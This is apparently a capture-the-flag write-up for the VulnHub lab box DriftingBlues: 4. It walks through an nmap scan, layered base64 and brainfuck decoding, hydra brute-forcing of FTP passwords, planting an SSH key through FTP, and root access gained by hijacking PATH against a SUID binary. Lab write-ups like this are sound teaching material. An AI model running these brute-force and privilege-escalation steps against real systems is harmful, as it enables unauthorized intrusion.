DriftingBlues: 4 Write-up

Box info:

Name: DriftingBlues: 4

OS: Linux

Rated Difficulty: 🟩🟩(easy)

Links: VulnHub

NMAP found 3 open ports: 21-- FTP, 22--SSH and 80--HTTP:

$ sudo nmap -sC -sV 192.168.0.91  
                                                                                             
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-31 17:40 EEST
Nmap scan report for 192.168.0.91
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:BA:43:FC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

First we'll visit port 80, website:

Nothing interesting, but checking the page source, there is a base64 encoded text:

This text was encoded multiple times, here is the result:

1st decode:
go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==

2nd decode:
tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=

3rd decode:
i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=

4th decode:
/imfuckingmad.txt

Accessing /imfuckingmad.txt we'll find another encoding, which is a brainfuck encoding:

Here is the decoded text:

man we are a tech company and still getting hacked??? what the shit??? enough is enough!!! 
#
...
#
/iTiS3Cr3TbiTCh.png

Visiting /iTiS3Cr3TbiTCh.png, we'll find a QRCode that we can see that it says by accessing this website: https://webqr.com/

The QRCode translates to am image link: https://i.imgur.com/a4JjS76.png

Next step is to brute force the password for the users from the above list against the FTP service using hydra:

The first user is luther:

hydra -l luther -P /usr/share/wordlists/rockyou.txt 192.168.0.91 ftp

And his password is:

Now we can access FTP as luther. Inside the FTP looks like there is a directory named hubert, 

Next I'll brute force hubert's FTP password, using same hydra command but changing the user from luther to hubert:

And we can login to the FTP as user hubert. Because he is the owner of the directory, inside the FTP directory I'll create a .ssh directory with a authorized_keys that has my id_rsa.pub key so I can access the box using ssh.

Now we can login to the box via ssh as user hubert using the following command:

ssh -i id_rsa hubert@<machine IP>

Now it's time for privilege escalation. Using linpeas, I've found a SUID that we can run:

Using the strings command on the file we can see what it does:

Looks like it runs some basic commands. The problem here is that is not using the absolute path for that commands that it calls to execute, and we can abuse that. 

Inside hubert's home directory create a file named cat with the following content:

#!/bin/bash
/bin/bash

Now using the following command add hubert's home directory to the path:

export PATH=$PATH:/home/hubert

And finally execute the SUID file again: /usr/bin/getinfo and you'll have root access: